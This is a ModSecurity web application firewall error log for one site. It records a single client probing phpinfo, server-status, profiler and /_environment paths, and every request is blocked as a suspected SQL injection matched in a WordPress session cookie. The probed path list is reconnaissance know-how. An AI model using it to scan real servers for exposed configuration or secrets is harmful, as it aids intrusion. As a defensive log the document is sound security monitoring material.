[Mon May 11 16:33:59.958874 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpversion.php"] [unique_id "agHo1_y_GXSWIKeli0v1nwAAAIg"]
[Mon May 11 16:34:00.119902 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/_phpinfo.php"] [unique_id "agHo2Py_GXSWIKeli0v1oQAAAIg"]
[Mon May 11 16:34:00.120119 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/_phpinfo.php"] [unique_id "agHo2Py_GXSWIKeli0v1oQAAAIg"]
[Mon May 11 16:34:00.120433 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/_phpinfo.php"] [unique_id "agHo2Py_GXSWIKeli0v1oQAAAIg"]
[Mon May 11 16:34:00.282339 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/old_phpinfo.php"] [unique_id "agHo2Py_GXSWIKeli0v1ogAAAIg"]
[Mon May 11 16:34:00.282543 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/old_phpinfo.php"] [unique_id "agHo2Py_GXSWIKeli0v1ogAAAIg"]
[Mon May 11 16:34:00.282803 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/old_phpinfo.php"] [unique_id "agHo2Py_GXSWIKeli0v1ogAAAIg"]
[Mon May 11 16:34:00.442177 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/server-info.php"] [unique_id "agHo2Py_GXSWIKeli0v1owAAAIg"]
[Mon May 11 16:34:00.442379 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/server-info.php"] [unique_id "agHo2Py_GXSWIKeli0v1owAAAIg"]
[Mon May 11 16:34:00.442615 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/server-info.php"] [unique_id "agHo2Py_GXSWIKeli0v1owAAAIg"]
[Mon May 11 16:34:00.600497 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/server-status.php"] [unique_id "agHo2Py_GXSWIKeli0v1pAAAAIg"]
[Mon May 11 16:34:00.600700 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/server-status.php"] [unique_id "agHo2Py_GXSWIKeli0v1pAAAAIg"]
[Mon May 11 16:34:00.600947 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/server-status.php"] [unique_id "agHo2Py_GXSWIKeli0v1pAAAAIg"]
[Mon May 11 16:34:00.758465 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/_profiler/phpinfo"] [unique_id "agHo2Py_GXSWIKeli0v1pQAAAIg"]
[Mon May 11 16:34:00.758655 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/_profiler/phpinfo"] [unique_id "agHo2Py_GXSWIKeli0v1pQAAAIg"]
[Mon May 11 16:34:00.758875 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/_profiler/phpinfo"] [unique_id "agHo2Py_GXSWIKeli0v1pQAAAIg"]
[Mon May 11 16:34:00.916722 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/_environment"] [unique_id "agHo2Py_GXSWIKeli0v1pgAAAIg"]
[Mon May 11 16:34:00.916925 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/_environment"] [unique_id "agHo2Py_GXSWIKeli0v1pgAAAIg"]
[Mon May 11 16:34:00.917176 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/_environment"] [unique_id "agHo2Py_GXSWIKeli0v1pgAAAIg"]
[Mon May 11 16:34:01.075978 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/webroot/index.php/_environment"] [unique_id "agHo2fy_GXSWIKeli0v1pwAAAIg"]
[Mon May 11 16:34:01.076199 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/webroot/index.php/_environment"] [unique_id "agHo2fy_GXSWIKeli0v1pwAAAIg"]
[Mon May 11 16:34:01.076454 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/webroot/index.php/_environment"] [unique_id "agHo2fy_GXSWIKeli0v1pwAAAIg"]
[Mon May 11 16:34:01.234142 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mail/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qAAAAIg"]
[Mon May 11 16:34:01.234349 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mail/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qAAAAIg"]
[Mon May 11 16:34:01.234595 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mail/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qAAAAIg"]
[Mon May 11 16:34:01.393224 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cpanel/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qQAAAIg"]
[Mon May 11 16:34:01.393443 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cpanel/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qQAAAIg"]
[Mon May 11 16:34:01.393684 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cpanel/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qQAAAIg"]
[Mon May 11 16:34:01.553466 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/hosting/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qgAAAIg"]
[Mon May 11 16:34:01.553673 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/hosting/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qgAAAIg"]
[Mon May 11 16:34:01.553898 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/hosting/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qgAAAIg"]
[Mon May 11 16:34:01.719495 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/webmail/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qwAAAIg"]
[Mon May 11 16:34:01.719716 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/webmail/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qwAAAIg"]
[Mon May 11 16:34:01.719990 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/webmail/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1qwAAAIg"]
[Mon May 11 16:34:01.877666 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/smtp/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1rAAAAIg"]
[Mon May 11 16:34:01.877869 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/smtp/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1rAAAAIg"]
[Mon May 11 16:34:01.878119 2026] [security2:error] [pid 1411201:tid 1411254] [client 35.88.116.41:42654] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/smtp/phpinfo.php"] [unique_id "agHo2fy_GXSWIKeli0v1rAAAAIg"]
